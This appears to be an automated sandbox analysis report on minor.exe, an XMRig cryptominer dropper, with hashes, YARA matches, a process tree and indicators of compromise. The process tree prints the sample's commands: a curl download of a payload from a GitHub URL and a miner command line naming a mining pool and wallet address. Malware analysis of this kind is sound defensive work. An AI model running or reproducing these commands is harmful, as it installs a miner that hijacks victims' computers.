xmrig | 6d415e41fc403775530efce9799170862a82d280a7d7adf62d76eaa08c0df2a6

General

Target

minor.exe
Size

5.3MB
MD5

86aea8fe1b99b196c52bcdd2ff694661
SHA1

258a811f758db8445811d26dc01bd73a950e486b
SHA256

6d415e41fc403775530efce9799170862a82d280a7d7adf62d76eaa08c0df2a6
SHA512

94bed31c18de74f293d4ac531070b3c82a1a01eea82e8b4999b6fd1dfe8a4b494cec01b89ea4f592a956086b7bf46fe65fb9df5f2eb16055ca22eb01d30fccdd
SSDEEP

98304:MG9ExC3hEqwkgp7gRgr3A/S4gHg4fjBolfeKYwPkC4MBmdJl:598pZr3US4aggKheJfMB0J

Score

10^/10

xmrig miner

Malware Config

Signatures

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral1/files/0x0007000000023422-37.dat	family_xmrig
behavioral1/files/0x0007000000023422-37.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
4352	minor.exe
2364	driver.exe

Loads dropped DLL 4 IoCs

pid	Process
4352	minor.exe
4352	minor.exe
4352	minor.exe
4352	minor.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
12	raw.githubusercontent.com
13	raw.githubusercontent.com

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	2364	driver.exe
Token: SeLockMemoryPrivilege	2364	driver.exe
Token: SeManageVolumePrivilege	1056	svchost.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2364	driver.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 1796 wrote to memory of 4352	1796	minor.exe	86
PID 1796 wrote to memory of 4352	1796	minor.exe	86
PID 4352 wrote to memory of 2612	4352	minor.exe	87
PID 4352 wrote to memory of 2612	4352	minor.exe	87
PID 2612 wrote to memory of 1568	2612	cmd.exe	88
PID 2612 wrote to memory of 1568	2612	cmd.exe	88
PID 4352 wrote to memory of 4828	4352	minor.exe	109
PID 4352 wrote to memory of 4828	4352	minor.exe	109
PID 4828 wrote to memory of 2364	4828	cmd.exe	110
PID 4828 wrote to memory of 2364	4828	cmd.exe	110

C:\Users\Admin\AppData\Local\Temp\minor.exe
"C:\Users\Admin\AppData\Local\Temp\minor.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1796
- C:\Users\Admin\AppData\Local\Temp\onefile_1796_133582633115678740\minor.exe
  "C:\Users\Admin\AppData\Local\Temp\minor.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4352
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c curl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o driver.exe
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Windows\system32\curl.exe
      curl -L -k https://github.com/mzusi/m/raw/main/SoundDriver.exe -o driver.exe
      4⤵
      PID:1568
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\driver.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4828
  - - C:\Users\Admin\AppData\Local\Temp\driver.exe
      "C:\Users\Admin\AppData\Local\Temp\driver.exe" --donate-level 1 --max-cpu-usage 60 -o pool.hashvault.pro:3333 -u 46ZMzz8br9seCKvP1xjQFWQkhYQQpjTvZKwFJ7NUFPWNZim5v1kpD7F2jPCpzpXKqV7ifmeM9kMPQcH8iJXmEKdrDiuBViq -p minor -k
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:2364

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe
1⤵
PID:3440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k UnistackSvcGroup
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Comms\UnistoreDB\store.jfm

Filesize
16KB

MD5
80dea5d7176dd5f1579b0e43d5d27432

SHA1
e0eca0585ab6ba9638752a1ffd65f2f5d4bde470

SHA256
ff0c17d3329134262997cfaf7a39768bc07c612fb76dd35767108e15e1ebd238

SHA512
19f2d228d99b2e35ed63710b8dcfd3ed848e5d4c4557a4c91ba69ccf18e8bcfc4bf0cea809a5e0c01f452a0f66f5186dfe822d83a423d53c81418cc5be9c4ff9

Download Submit
C:\Users\Admin\AppData\Local\Temp\driver.exe

Filesize
5.1MB

MD5
99aa369598e5d8eba59b7d0f0a8429f9

SHA1
7baaf6546112049038e4c62143ce7dd77c3a97c9

SHA256
8174ccc5cfae43503648608ba6ae14b00679517591a2cdff9017c4be2ab2996b

SHA512
3fdb8674033d6736bb548c262f54e1277c196fb83c3bfcc6dbe9b8bb126fb3f8404b6385f666b389e5ea84ab7261bcb65dddd88e39c53d3d0e6813dd9212c62f

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1796_133582633115678740\VCRUNTIME140.dll

Filesize
96KB

MD5
f12681a472b9dd04a812e16096514974

SHA1
6fd102eb3e0b0e6eef08118d71f28702d1a9067c

SHA256
d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8

SHA512
7d3accbf84de73fb0c5c0de812a9ed600d39cd7ed0f99527ca86a57ce63f48765a370e913e3a46ffc2ccd48ee07d823dafdd157710eef9e7cc1eb7505dc323a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1796_133582633115678740\_bz2.pyd

Filesize
81KB

MD5
4101128e19134a4733028cfaafc2f3bb

SHA1
66c18b0406201c3cfbba6e239ab9ee3dbb3be07d

SHA256
5843872d5e2b08f138a71fe9ba94813afee59c8b48166d4a8eb0f606107a7e80

SHA512
4f2fc415026d7fd71c5018bc2ffdf37a5b835a417b9e5017261849e36d65375715bae148ce8f9649f9d807a63ac09d0fb270e4abae83dfa371d129953a5422ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1796_133582633115678740\_lzma.pyd

Filesize
154KB

MD5
337b0e65a856568778e25660f77bc80a

SHA1
4d9e921feaee5fa70181eba99054ffa7b6c9bb3f

SHA256
613de58e4a9a80eff8f8bc45c350a6eaebf89f85ffd2d7e3b0b266bf0888a60a

SHA512
19e6da02d9d25ccef06c843b9f429e6b598667270631febe99a0d12fc12d5da4fb242973a8351d3bf169f60d2e17fe821ad692038c793ce69dfb66a42211398e

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1796_133582633115678740\minor.exe

Filesize
6.6MB

MD5
200fee01cf3de4da6bf580c14e1e77e6

SHA1
611dde1205e4d0ade3d83cd7c24b4471beb32fbd

SHA256
ceeea1d4ce20711bceca9919b1d203532fc2a5cacd11552205dd979df28175c1

SHA512
b0e492446c42e237701bb15929de7494e98556b1f8d54968b348610244ed6f34d9ec53bedf37b285f680dc6eb46cbb7518b8a89df5dad4a6aa27369be0b532fe

Download Submit
C:\Users\Admin\AppData\Local\Temp\onefile_1796_133582633115678740\python311.dll

Filesize
5.5MB

MD5
9a24c8c35e4ac4b1597124c1dcbebe0f

SHA1
f59782a4923a30118b97e01a7f8db69b92d8382a

SHA256
a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7

SHA512
9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b

Download Submit
memory/1796-21-0x00007FF7C8A20000-0x00007FF7C8F91000-memory.dmp

Filesize
5.4MB

Download
memory/2364-55-0x000001D58EA50000-0x000001D58EA70000-memory.dmp

Filesize
128KB

Download
memory/2364-39-0x000001D58D140000-0x000001D58D160000-memory.dmp

Filesize
128KB

Download
memory/2364-42-0x000001D58EA30000-0x000001D58EA50000-memory.dmp

Filesize
128KB

Download
memory/2364-49-0x000001D58EA50000-0x000001D58EA70000-memory.dmp

Filesize
128KB

Download
memory/4352-22-0x00007FF6C2470000-0x00007FF6C2B1A000-memory.dmp

Filesize
6.7MB

Download
memory/4352-41-0x00007FF6C2470000-0x00007FF6C2B1A000-memory.dmp

Filesize
6.7MB

Download

Analysis

Sharing